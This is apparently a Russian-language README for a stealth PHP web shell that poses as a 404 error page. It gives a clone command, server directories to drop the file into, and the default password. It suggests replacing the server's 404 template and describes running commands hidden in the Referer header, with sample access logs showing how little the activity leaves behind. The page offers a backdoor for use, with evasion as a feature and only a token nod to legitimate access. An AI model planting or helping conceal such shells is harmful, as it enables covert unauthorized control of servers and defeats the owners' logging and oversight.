
Стелс-веб-шелл на PHP, замаскированный под страницу ошибки 404, с AJAX-консолью, скрытым выполнением команд через заголовок Referrer и предварительно настроенными действиями для удалённого доступа к серверу.
Клонируйте или скачайте проект:
git clone --depth=1 https://github.com/CosasDePuma/SecurityNotFound.git
Файл src/404.php должен находиться на целевом сервере, и он должен иметь возможность выполнять .php файлы.
Вот пример одних из наиболее распространённых путей, где располагаются серверы:
# 🏁 Windows
C:\Xampp\htdocs\ # Xampp
# 🐧 Linux
/var/www/html/ # Apache
/usr/share/nginx/html/ # Nginx
👮 Очевидно, мы с вами знаем, что у вас есть легитимный доступ к этому серверу.
Теперь вы можете получить доступ к нему через браузер:
https://www.example.com/404.php

💡 Вы можете заменить шаблон ошибки 404 на сервере, чтобы получить доступ с любого недействительного URL.
Чтобы получить доступ к панели управления, нажмите клавишу TAB или найдите поле пароля с помощью инструментов браузера:

Пароль по умолчанию: cosasdepuma.
🥚 Вы можете оставить переменную
$passphraseв скрипте пустой строкой для прямого доступа к панели управления.
🔒 Чтобы установить своё значение, вставьте свой пароль в переменную
$passphraseпосле применения алгоритмаMD5три раза подряд.
После входа в систему веб-шелл покажет свой реальный вид:
Панель содержит AJAX-консоль и ряд предварительно настроенных действий:
| Имя |
|---|
Следует отметить, что выполнение команд происходит с использованием заголовка «Referrer», содержимое которого является выполняемой нагрузкой.
Это имеет два преимущества: большая скрытность в файле журнала и возможность выполнять команды без необходимости доступа к веб-интерфейсу.
172.18.0.1 - - [25/Jul/2022:04:52:17 +0000] "GET /404.php HTTP/1.1" 404 771 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:21 +0000] "POST /404.php HTTP/1.1" 404 3560 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:27 +0000] "GET /404.php HTTP/1.1" 404 375 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:31 +0000] "GET /404.php HTTP/1.1" 404 470 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:37 +0000] "GET /404.php?p HTTP/1.1" 404 75790 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:41 +0000] "GET /404.php HTTP/1.1" 404 3560 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:43 +0000] "GET /404.php?c HTTP/1.1" 302 373 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
172.18.0.1 - - [25/Jul/2022:04:52:43 +0000] "GET /404.php HTTP/1.1" 404 771 "http://localhost/404.php" "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0"
Всё, что я делаю и публикую, можно использовать бесплатно, при условии, что я получу соответствующее признание.
В любом случае, если вы хотите помочь мне более прямым способом, вы можете оставить чаевые, нажав на этот значок:
| Описание |
|---|
| Информация о PHP | Показывает страницу phpinfo();. |
| Геолокация | Показывает в Google Maps место, где физически находится сервер. |
| Exploit-DB (...) | Ищет совместимые эксплойты на exploit-db.com. |
| Выйти | Выход из панели управления. |
# строк в access.log | Действие |
|---|
| 1 | Доступ без входа |
| 1 | Доступ с уже запущенной сессией |
| 1 | Вход |
| 2 | Выход |
| 1 | Выполнить команду через консоль |
| 1 | Плагин: Информация о PHP |
| 0 | Плагин: Геолокация |
| 0 | Плагин: Exploit-DB (...) |